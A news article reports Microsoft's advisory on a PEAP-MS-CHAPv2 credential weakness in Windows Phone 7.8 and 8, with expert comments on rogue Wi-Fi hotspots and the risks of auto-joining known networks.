The issue is that Microsoft committed one of the cardinal sins of security: it took a good idea (encryption), implemented it badly in Windows Phone 7.8 and Windows Phone 8 operating systems and then released it to the market, said Kevin O’Brien, an enterprise solution architect at CloudLock.
Microsoft is warning consumers with smartphones that sport the Windows Phone 7.8 and Windows 8 mobile operating systems that they could be open for attack.
Hackers could exploit a weakness in the Wi-Fi authentication process, known as PEAP-MS-CHAPv2 (Protected Extensible Authentication Protocol with Microsoft Challenge Handshake Authentication Protocol version 2), to access the user’s log-on credentials.
“In vulnerable scenarios, an attacker who successfully exploited this issue could achieve information disclosure against the targeted device,” the company said in a security advisory. “Microsoft is not currently aware of active attacks or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.”
Intercepting Encrypted Credentials
Here’s how an attacker-controlled system could exploit the weakness: First, the system poses as a known Wi-Fi access point. This charade would cause the targeted device to automatically attempt to authenticate with the access point. That, in turn, would allow the attacker to intercept the victim’s encrypted domain credentials.
At that point, an attacker could exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to grab the victim’s domain credentials. Finally, those credentials could be used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on the network.
We caught up with Kevin O’Brien, an enterprise solution architect at CloudLock, to get his take on the exploit. He told us the pivot point is cryptographic weakness.
“We’ve seen this particular type of vulnerability before, including from Microsoft, whose ASP.NET framework had a similar issue a few years ago,” O’Brien said. “We’ve seen it recently, in the now well-known Cryptocat exploit. And we’ll see it again.
As O’Brien sees it, the issue is that Microsoft committed one of the cardinal sins of security: it took a good idea (encryption), implemented it badly and then released it to the market.
“What went wrong in the MS-CHAPv2 example here is that the protocol relies largely upon smoke and mirrors to appear confusing, either intentionally or due to a lack of understanding on the behalf of the original coders,” O’Brien said. “As a result, the entire protocol is compromised, and it should cease to be used in favor of the far more robust open-source alternatives in the market today.”
A Recipe for Mass Compromise
Mike Gross, Global Risk strategy director at 41st Parameter, told us the lesson: most mobile devices, by default, enable convenient access to known Wi-Fi and other networks, so users need to be aware of these settings and how they can protect themselves.
“While there are specific steps that businesses can take to protect their secure networks from unauthorized access, users will unfortunately still be vulnerable to attack unless they disable the option to automatically connect to known Wi-Fi networks — something most consumers will not do because of the inconvenience involved in reconnecting every time they come home or walk into an airport,” he said.
In many cases, Gross noted, a smartphone or tablet user may simply be strolling through his local airport where an attacker has set up a Wi-Fi hotspot mimicking that of the legitimate public Wi-Fi, using the airport code as a network ID and not requiring a password to connect. He called this scenario a recipe for mass-compromise, as mobile devices would likely connect to the known network without hesitation.
“Even if the Wi-Fi auto-join feature is disabled, consumers are not in the clear. They will likely still be prompted to connect to a Wi-Fi network and should be extra vigilant when traveling or in a public location where this type of network spoofing is possible,” Gross said. “Smartphone software configurations and defaults are clearly set up with user convenience in mind, so consumers must take extra steps to protect themselves and the integrity of their mobile devices.”